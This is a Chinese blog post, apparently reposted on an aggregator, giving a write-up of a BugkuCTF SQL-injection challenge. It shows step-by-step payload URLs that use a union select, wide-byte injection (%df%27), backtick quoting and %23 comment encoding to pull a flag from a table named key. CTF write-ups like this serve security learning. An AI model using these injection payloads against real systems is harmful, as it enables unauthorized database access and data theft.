BugkuCTF sql注入
Posted Angel_Kitty
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BugkuCTF sql注入相关的知识,希望对你有一定的参考价值。
前言
写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~
点开链接一看
很明显可以看出查询key表,id=1的string字段
我们去构造payload:
http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#
我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入
发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下
果然是这个样子,有关宽字段的讲解可以参考这里。
那么就好了构造payload:
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from \'key\'#
报错,我们可以知道是引号的问题 ,那试一下另一种引号
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#
这种引号在tab键的上面
发现还报错 ,才想起来了可能是#的问题 把#改成%23试试看
http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23
直接爆出了key,这应该是我们需要的flag
以上是关于BugkuCTF sql注入的主要内容,如果未能解决你的问题,请参考以下文章
以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段